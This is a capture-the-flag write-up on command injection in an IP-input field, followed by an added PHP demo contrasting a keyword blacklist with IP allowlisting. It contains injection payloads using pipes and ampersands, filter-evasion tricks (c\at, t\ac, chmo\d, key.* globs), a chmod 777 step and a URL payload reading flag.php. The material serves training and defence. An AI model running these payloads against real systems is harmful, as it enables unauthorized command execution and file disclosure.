2022 CISP-PTE (3): Command Execution
2022-07-03 06:13:00 【Aτθ】
I. Challenge 1
1. Challenge environment


2. Getting the key
2.1 Listing the directory
127.0.0.1 | ls


127.0.0.1 | ls ../

2.2 Reading the file
Common command execution functions:
system("ls");
eval, exec
Reading files on Linux: cat, tac, less, more, head, tail
ca\t, ca''t, ca""t
If key.php is filtered:
key.*  k{e}y.php  k?y.php
127.0.0.1 | c\at ../key.php


127.0.0.1 | t\ac ../key.php

II. Challenge 2
1. Challenge environment


2. Solution steps
2.1 Listing the directory

2.2 Raising permissions
127.0.0.1 & l\s -al ../key.*
127.0.0.1 & chmo\d 777 ../key.*
127.0.0.1 & l\s -al ../key.*



2.3 Getting the key
127.0.0.1 & t\ac ../key.*

III. Challenge 3
1. Challenge environment

2. Solution steps

IV. Challenge 4
1. Challenge environment

2. Solution steps
2.1 ls

2.2 Getting the key
http://81.70.245.6:50289?c=cat flag.php;
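
The payloads in these challenges work because the input reaches a shell and any filtering only looks for literal keywords. The following added example (not part of the original post) runs a keyword blacklist and strict IP validation over payloads quoted above; the blacklist contents, the function names and the ping handler are assumptions, since the challenge source is not shown.

```php
<?php
declare(strict_types=1);

// Added example, not from the original post. The blacklist below is an
// assumption: the write-up does not show the challenges' real filter.
const BLOCKED_WORDS = ['cat', 'tac', 'ls', 'chmod', 'key.php'];

/** Keyword blacklist: accepts input unless a blocked word appears literally. */
function blacklist_accepts(string $input): bool
{
    foreach (BLOCKED_WORDS as $word) {
        if (stripos($input, $word) !== false) {
            return false;
        }
    }
    return true;
}

/** Allowlist: accepts only a syntactically valid IPv4/IPv6 address. */
function allowlist_accepts(string $input): bool
{
    return filter_var($input, FILTER_VALIDATE_IP) !== false;
}

/** Hypothetical ping handler: validate first, then quote the single argument. */
function safe_ping(string $ip): array
{
    if (!allowlist_accepts($ip)) {
        throw new InvalidArgumentException('not an IP address');
    }
    // escapeshellarg() is defence in depth; a validated IP has no metacharacters.
    exec('ping -c 1 ' . escapeshellarg($ip), $output, $status);
    return ['status' => $status, 'output' => $output];
}

// Constructed sample inputs: one benign value plus payloads quoted in this write-up.
$samples = [
    '127.0.0.1',
    '127.0.0.1 | ls',
    '127.0.0.1 | c\at ../key.php',
    '127.0.0.1 & t\ac ../key.*',
    '127.0.0.1 & chmo\d 777 ../key.*',
];
foreach ($samples as $s) {
    printf("%-34s blacklist=%-6s allowlist=%s\n", $s,
        blacklist_accepts($s) ? 'pass' : 'block',
        allowlist_accepts($s) ? 'pass' : 'block');
}
```

The last two samples pass the blacklist because the backslash and the glob hide the blocked words from a literal match, while the allowlist rejects everything except the bare address.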

